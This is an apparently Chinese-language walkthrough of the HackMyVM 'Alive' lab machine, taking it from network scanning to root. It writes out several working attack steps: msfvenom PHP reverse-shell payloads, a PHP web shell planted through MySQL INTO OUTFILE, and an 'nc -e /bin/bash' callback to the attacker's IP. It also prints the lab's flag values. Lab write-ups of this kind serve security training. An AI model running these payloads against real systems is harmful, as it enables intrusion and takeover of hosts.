信息收集

IP定位

1
┌──(root㉿kali)-[/home/kali]
2
└─# arp-scan -l | grep "08:00:27"
3
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
4
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
5
172.16.52.191   08:00:27:46:80:b7       (Unknown)

nmap扫描

1
┌──(root㉿kali)-[/home/kali]
2
└─# nmap -Pn -sTCV -T4 172.16.52.191
3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-10 15:57 EST
4
Nmap scan report for 172.16.52.191
5
Host is up (0.00056s latency).
6
Not shown: 998 closed tcp ports (conn-refused)
7
PORT   STATE SERVICE VERSION
8
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
9
| ssh-hostkey:
10
|   3072 26:9c:17:ef:21:36:3d:01:c3:1d:6b:0d:47:11:cd:58 (RSA)
11
|   256 29:26:68:49:b0:37:5c:0e:7b:6d:81:8d:60:98:8d:fc (ECDSA)
12
|_  256 13:2e:13:19:0c:9d:a3:a7:3e:b8:df:ab:97:08:41:88 (ED25519)
13
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
14
|_http-title: Host alive
15
|_http-server-header: Apache/2.4.54 (Debian)
16
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
17

18
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
19
Nmap done: 1 IP address (1 host up) scanned in 23.22 seconds

80端口

Wireshark

出现了个url请求界面，发送请求到攻击机并用wireshark抓包

没什么用

尝试包含以下自身

目录扫描

1
┌──(root㉿kali)-[/home/kali]
2
└─# dirsearch -u http://172.16.52.191/
3
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
4
  from pkg_resources import DistributionNotFound, VersionConflict
5

6
  _|. _ _  _  _  _ _|_    v0.4.3
7
 (_||| _) (/_(_|| (_| )
8

9
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
10

11
[16:07:20] 301 -  312B  - /tmp  ->  http://172.16.52.191/tmp/
12
[16:07:20] 200 -  403B  - /tmp/

访问tmp目录

可以发现是一个空目录

本地生成webshell尝试请求

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/alive]
2
└─# msfvenom -p php/reverse_php LHOST=172.16.55.210 LPORT=8888 -o shell.php
3
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
4
[-] No arch selected, selecting arch: php from the payload
5
No encoder specified, outputting raw payload
6
Payload size: 2648 bytes
7
Saved as: shell.php

1
🔹 垂直分屏（左右）
2
Ctrl + Shift + R
3

4
🔹 水平分屏（上下）
5
Ctrl + Shift + D
6

7
关闭当前 Pane
8
Ctrl + Shift + E

1
──(root㉿kali)-[/home/kali/Desktop/hmv/alive]
2
└─# python -m http.server
3
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ..

已知该页面会包含请求界面

那么我们用 > 将我们的shell文件写入到tmp目录中

1
msf6 exploit(multi/handler) > set LHOST 172.16.55.210
2
LHOST => 172.16.55.210
3
msf6 exploit(multi/handler) > set LPORT 8888
4
LPORT => 8888
5
msf6 exploit(multi/handler) > set ExitOnSession false
6
ExitOnSession => false
7
msf6 exploit(multi/handler) > run -j

www-data

1
env
2
APACHE_RUN_DIR=/var/run/apache2
3
APACHE_PID_FILE=/var/run/apache2/apache2.pid
4
JOURNAL_STREAM=8:11609
5
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
6
INVOCATION_ID=1fc37cab8b9745acbd2a7774df25f197
7
APACHE_LOCK_DIR=/var/lock/apache2
8
LANG=C
9
APACHE_RUN_USER=www-data
10
APACHE_RUN_GROUP=www-data
11
APACHE_LOG_DIR=/var/log/apache2
12
PWD=/var/www/html/tmp

获得www-data权限

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/alive]
2
└─# msfvenom -p php/meterpreter_reverse_tcp LHOST=172.16.55.210 LPORT=8888 -o shell_m.php
3

4

5
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l
6

7
Active sessions
8
===============
9

10
  Id  Name  Type                  Information           Connection
11
  --  ----  ----                  -----------           ----------
12
  7         shell php/php                               172.16.55.210:8888 ->
13
                                                         172.16.52.191:37094
14
                                                        (172.16.52.191)
15
  8         meterpreter x86/linu  www-data @ alive.hmv  172.16.55.210:4433 ->
16
            x                                            172.16.52.191:33030
17
                                                        (172.16.52.191)
18
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 8
19
[*] Starting interaction with 8...
20

21
meterpreter > shell
22
script /dev/null -c bash
23
www-data@alive:~/html/tmp$

1
cd home
2
ls
3
alexandra
4
cd alexandra
5
ls
6
user.txt
7
cat user.txt
8
cat: user.txt: Permission denied

权限不够

进一步信息收集吧

提权

1
<?php
2
if ($_SERVER["REQUEST_METHOD"] == "POST") {
3
    $url = $_POST["url"];
4
    $allowed_chars = '/^[^;|&$`()\[\]]*$/';
5
    if(empty($url)) {
6
        echo "Empty URL!";
7
    } elseif (!preg_match($allowed_chars, $url)) {
8
        echo "Invalid URL!";
9
    } else {
10
        $command = 'curl -s ' . $url;
11
        exec($command . ' 2>&1', $output, $return_var);
12
        echo implode("\n", $output);
13
    }
14
}
15
?>

1
<?php
2
    $servername = "localhost";
3
    $username = "admin";
4
    $password = "HeLL0alI4ns";
5
    $dbname = "digitcode";
6

7
    $conn = new mysqli($servername, $username, $password, $dbname);
8

9
    if ($conn->connect_error) {
10
        die("Connection failed: " . $conn->connect_error);
11
    }
12

13
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
14
        $digit = mysqli_real_escape_string($conn, $_POST["digit"]);
15

16
        $stmt = $conn->prepare("SELECT digit, url FROM code, path WHERE code.id = path.id and code.id = ?");
17
        $stmt->bind_param("i", $id);
18
        $id = 1;
19
        $stmt->execute();
20
        $stmt->bind_result($correct_digit, $path);
21
        $stmt->fetch();
22
        $stmt->close();
23

24
        if ($digit === $correct_digit) {
25
            header("Location: $path");
26
            exit;
27
        } else {
28
            echo "Wrong digit code.";
29
        }
30
    }
31

32
    $conn->close();
33
?>

找到数据库账号密码

1
$username = "admin";
2

3
$password = "HeLL0alI4ns";
4

5
$dbname = "digitcode";

1
www-data@alive:~/html/tmp$ mysql -u admin -p
2
mysql -u admin -p
3
Enter password: HeLL0alI4ns
4

5
Welcome to the MariaDB monitor.  Commands end with ; or \g.
6
Your MariaDB connection id is 12
7
Server version: 10.3.25-MariaDB MariaDB Server
8

9
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
10

11
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
12

13
MariaDB [(none)]> show databases;
14
show databases;
15
+--------------------+
16
| Database           |
17
+--------------------+
18
| digitcode          |
19
| information_schema |
20
| mysql              |
21
| performance_schema |
22
| qdpm_db            |
23
+--------------------+
24
5 rows in set (0.000 sec)
25

26
MariaDB [(none)]> use digitcode;
27
Reading table information for completion of table and column names
28
You can turn off this feature to get a quicker startup with -A
29

30
Database changed
31
MariaDB [digitcode]> show tables;
32
+---------------------+
33
| Tables_in_digitcode |
34
+---------------------+
35
| code                |
36
| path                |
37
+---------------------+
38
2 rows in set (0.000 sec)
39

40
MariaDB [digitcode]> use qdpm_db;
41
Reading table information for completion of table and column names
42
You can turn off this feature to get a quicker startup with -A
43

44
Database changed
45
MariaDB [qdpm_db]> show tables;
46
+----------------------+
47
| Tables_in_qdpm_db    |
48
+----------------------+
49
| attachments          |
50
| configuration        |
51
| departments          |
52
| discussions          |
53
| discussions_comments |
54
| discussions_reports  |
55
| discussions_status   |
56
| events               |
57
| extra_fields         |
58
| extra_fields_list    |
59
| phases               |
60
| phases_status        |
61
| projects             |
62
| projects_comments    |
63
| projects_phases      |
64
| projects_reports     |
65
| projects_status      |
66
| projects_types       |
67
| tasks                |
68
| tasks_comments       |
69
| tasks_groups         |
70
| tasks_labels         |
71
| tasks_priority       |
72
| tasks_status         |
73
| tasks_types          |
74
| tickets              |
75
| tickets_comments     |
76
| tickets_reports      |
77
| tickets_status       |
78
| tickets_types        |
79
| user_reports         |
80
| users                |
81
| users_groups         |
82
| versions             |
83
| versions_status      |
84
+----------------------+
85
35 rows in set (0.000 sec)
86

87
MariaDB [qdpm_db]> select * from users;
88
+----+----------------+---------------+-------+-------------------------+---------+------------------------------------+--------+------+
89
| id | users_group_id | name          | photo | email                   | culture | password                           | active | skin |
90
+----+----------------+---------------+-------+-------------------------+---------+------------------------------------+--------+------+
91
|  3 |              1 | administrator |       | administrator@alive.hmv |         | $P$EXzIrSSSu7iTu2wc9sFTh29F7Ajn371 |      1 | NULL |
92
+----+----------------+---------------+-------+-------------------------+---------+------------------------------------+--------+------+
93
1 row in set (0.000 sec)
94

95
MariaDB [qdpm_db]> exit
96
Bye

1
www-data@alive:~/html/tmp$ ps aux | grep mysql
2
ps aux | grep mysql
3
root         450  0.0  0.0   2484  1544 ?        S    13:58   0:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --user=root --bind-address=127.0.0.1 --socket=/run/mysqld/mysqld.sock
4
root         590  0.0  6.0 1234500 96684 ?       Sl   13:58   0:04 /usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data --plugin-dir=/usr/local/mysql/lib/plugin --user=root --bind-address=127.0.0.1 --log-error=/usr/local/mysql/data/alive.hmv.err --pid-file=alive.hmv.pid --socket=/run/mysqld/mysqld.sock

⚠️ MySQL 是以 root 用户运行的！

1
www-data@alive:~/html/tmp$ curl 127.0.0.1:8000
2
curl 127.0.0.1:8000
3
<!DOCTYPE html>
4
<html>
5
    <head>
6
        <title>Backup</title>
7
    </head>
8
    <body>
9
        <p>Only local zipped backup.</p>
10

11
    </body>
12
</html>

1
www-data@alive:~/html/tmp$ ps -ef | grep 8000
2
ps -ef | grep 8000
3
root         448     446  0 13:58 ?        00:00:00 /bin/sh -c php -t /opt -S 127.0.0.1:8000
4
root         449     448  0 13:58 ?        00:00:00 php -t /opt -S 127.0.0.1:8000
5
www-data    1313    1261  0 15:24 pts/1    00:00:00 grep 8000

1
MariaDB [(none)]> select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/opt/shell.php'
2

3
    -> ;
4

5
Query OK, 1 row affected (0.015 sec)
6

7

8

9
MariaDB [(none)]> exit
10

11
Bye

1
www-data@alive:/opt$ curl 127.0.0.1:8000/shell.php?cmd=whoami
2
curl 127.0.0.1:8000/shell.php?cmd=whoami
3
root

1
curl 127.0.0.1:8000/shell.php?cmd=nc%20-e%20/bin/bash%20172.16.55.210%204444
2

3
┌──(root㉿kali)-[/home/kali/Desktop/hmv/alive]
4
└─# nc -lvvp 4444
5
listening on [any] 4444 ...
6
172.16.52.191: inverse host lookup failed: Host name lookup failure
7
connect to [172.16.55.210] from (UNKNOWN) [172.16.52.191] 46988
8
whoami
9
root

1
cd alexandra
2
ls
3
user.txt
4
cat user.txt
5
1637c0ee2d19e925bd6394c847a62ed5
6

7

8
cd /root
9
cat root.txt
10
819be2c3422a6121dac7e8b1da21ce32

Thanks for reading!

HMV-Alive

Wed Dec 10 2025

144 words · 1 minutes

Documentation Hackmyvm Hackmyvm Linux Machine Enumeration Kerberos Privilege Escalation